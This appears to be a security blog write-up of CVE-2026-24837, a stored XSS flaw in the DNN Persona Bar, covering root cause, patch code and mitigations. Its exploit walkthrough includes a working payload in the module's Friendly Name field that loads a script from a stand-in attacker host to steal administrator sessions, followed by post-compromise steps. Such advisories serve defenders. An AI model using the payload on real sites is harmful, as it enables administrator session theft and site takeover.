CVE-2026-24837
7.70.04%
Friendly Fire: Stored XSS in DNN Persona Bar (CVE-2026-24837)
Alon Barad
Software EngineerJan 28, 2026·6 min read·9 visits
PoC Available
Executive Summary (TL;DR)
Improper sanitization in DNN's Persona Bar allows attackers to hide JavaScript in a module's name. When an admin tries to delete the module, the script executes. Fix available in v9.13.10 and v10.2.0.
A high-severity Stored Cross-Site Scripting (XSS) vulnerability exists in the DNN (DotNetNuke) Platform's Persona Bar. The flaw allows privileged attackers to inject malicious JavaScript into the 'Friendly Name' property of a module. This payload is stored in the database and executed in the context of any administrator who views the module deletion confirmation modal, leading to potential full site compromise.
The Hook: When "Friendly" Isn't So Friendly
DNN (formerly DotNetNuke) is the cockroach of the CMS world—it survives everything. In its modern evolution, it slapped a shiny React-based Single Page Application (SPA) called the "Persona Bar" on top of its legacy ASP.NET backend. This bar is the cockpit for administrators, allowing them to manage pages, users, and modules via REST APIs.
But here's the thing about modern SPAs on legacy backends: they often disagree on who is responsible for security. The backend thinks, "I'm just storing data; the frontend will escape it." The frontend thinks, "This data came from our trusted database; surely it's safe to render raw HTML." CVE-2026-24837 is exactly what happens when that trust model falls apart.
We are looking at a Stored Cross-Site Scripting (XSS) vulnerability nestled in the module management logic. It’s not a complex buffer overflow or a cryptographic break. It’s the digital equivalent of labeling a bottle of poison "Apple Juice" and watching the bartender pour it for the VIPs. If you can poison the FriendlyName of a module, you can hijack the session of the SuperUser who comes to clean it up.
The Flaw: Trusting the DOM
The root cause is a classic failure in Output Encoding. In React, data binding is safe by default—if you write <div>{moduleName}</div>, React escapes special characters. To get XSS in React, a developer usually has to go out of their way to use dangerouslySetInnerHTML or mix in legacy jQuery code that manipulates the DOM directly.
In this specific case, the vulnerability lives in the modal dialog used to confirm module deletion. When a module is flagged for removal, the UI fetches its metadata, including the FriendlyName. The developers likely wanted to support some formatting in module names or simply reused a generic modal component that supports HTML content.
Instead of treating the module name as a string literal, the application treats it as markup. The browser sees <img src=x onerror=alert(1)>, parses the tag, tries to load the image, fails, and executes the error handler. Because this payload is pulled from the ModuleDefinitions table in the database, it persists across sessions. It sits there, waiting like a landmine for an administrator to trigger the "Delete" workflow.
The Code: Bringing in the Heavy Artillery
The fix for this is fascinating because it wasn't just a simple escape function; the DNN team realized they had a systemic problem. They didn't just patch the modal; they introduced a full-blown sanitization library.
In the patch analysis (Commit 1920793), we see the introduction of AngleSharp and HtmlSanitizer. This is significant. It implies that simply encoding output wasn't enough—they needed to strip dangerous tags while potentially preserving safe HTML in other areas.
They added a new utility in HtmlUtils.cs:
public static string CleanOutOfJavascript(string htmlInput)
{
var sanitizer = new HtmlSanitizer();
sanitizer.AllowedAttributes.Remove("onclick");
sanitizer.AllowedSchemes.Remove("javascript");
sanitizer.AllowedTags.Remove("script");
return sanitizer.Sanitize(htmlInput);
}This is the "Nuclear Option" of XSS prevention. Instead of trusting the frontend to escape data, they are now scrubbing the data before it's even eligible for rendering. They also added specific checks in TabModulesController.cs to enforce these checks based on PortalSettings. This confirms that previous versions were blindly trusting database content to be clean.
The Exploit: Trojan Horse Module
Let's construct the kill chain. To pull this off, you need Page Editor permissions or higher—someone who can install modules or modify page settings. You don't need to be a SuperUser (the target), just someone with enough rights to change a label.
Step 1: The Setup You navigate to the Module Settings for a standard Text/HTML module. In the "Friendly Name" field, which usually says something boring like "Content Block", you inject the payload:
My Safe Module <img src=x onerror="var s=document.createElement('script');s.src='https://attacker.com/hook.js';document.head.appendChild(s);">Step 2: The Trap The application saves this string into the database without complaint. To the casual observer viewing the page, nothing happens yet because the friendly name isn't always rendered as raw HTML in the main view.
Step 3: The Trigger A SuperUser logs in to do some maintenance. They see this oddly named module or perhaps you reported it as "broken" to lure them in. They decide to delete it. They enter the Persona Bar, hover over the module, and click the Trash icon.
Step 4: The Execution The application pops up: "Are you sure you want to delete 'My Safe Module [IMAGE]'?"
Before they can even click "Yes", the browser renders the name in the modal. The onerror event fires. The script loads. You now have their session cookies, anti-forgery tokens, and full control over the DNN instance.
The Impact: From XSS to RCE
Why is this rated High (CVSS 7.7) and not Critical? Only because it requires High Privileges (PR:H) to stage the attack. But make no mistake: inside the DNN ecosystem, XSS for a SuperUser is functionally equivalent to Remote Code Execution (RCE).
DNN has a powerful API. With the victim's session, your JavaScript payload can:
- Create a new SuperUser account for persistent access.
- Upload arbitrary files via the File Manager or Digital Asset Management module.
- Execute SQL via the SQL Console (if enabled).
- Edit the
web.configto disable security checks.
You aren't just stealing a cookie; you are effectively sitting at the keyboard of the system administrator.
The Fix: Sanitize or Die
If you are running DNN Platform 9.x prior to 9.13.10 or 10.x prior to 10.2.0, you are vulnerable. The update is mandatory.
Mitigation Strategy:
- Upgrade: Apply the official patch which integrates
HtmlSanitizer. - Audit: Run a SQL query against your
ModuleDefinitionsandTabModulestables looking for%<script>%or%onerror=%.SELECT * FROM ModuleDefinitions WHERE FriendlyName LIKE '%<script%'; - WAF: Ensure your Web Application Firewall is inspecting POST requests to the API endpoints
/DesktopModules/InternalServices/API/*for XSS signatures.
Don't rely on "being careful." In a complex codebase like DNN, data flows in unexpected ways. Rely on the patch.
Official Patches
Fix Analysis (1)
Technical Appendix
CVSS Score
7.7/ 10
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:HEPSS Probability
0.04%
Top 89% most exploited
Affected Systems
DNN Platform 9.xDNN Platform 10.x
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
DNN Platform DNN Software | 9.0.0 <= v < 9.13.10 | 9.13.10 |
DNN Platform DNN Software | 10.0.0 <= v < 10.2.0 | 10.2.0 |
| Attribute | Detail |
|---|---|
| CWE | CWE-79 (Stored XSS) |
| CVSS v3.1 | 7.7 (High) |
| Attack Vector | Network (Authenticated) |
| Privileges Required | High (Page Editor/Admin) |
| Impact | Session Hijacking / RCE via Admin API |
| Patch | HtmlSanitizer Integration |
MITRE ATT&CK Mapping
CWE-79
Stored Cross-Site Scripting
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Known Exploits & Detection
Vulnerability Timeline
Fix committed to GitHub (v10.2.0)
2025-12-16
CVE-2026-24837 Published
2026-01-27
Public Advisory Released
2026-01-27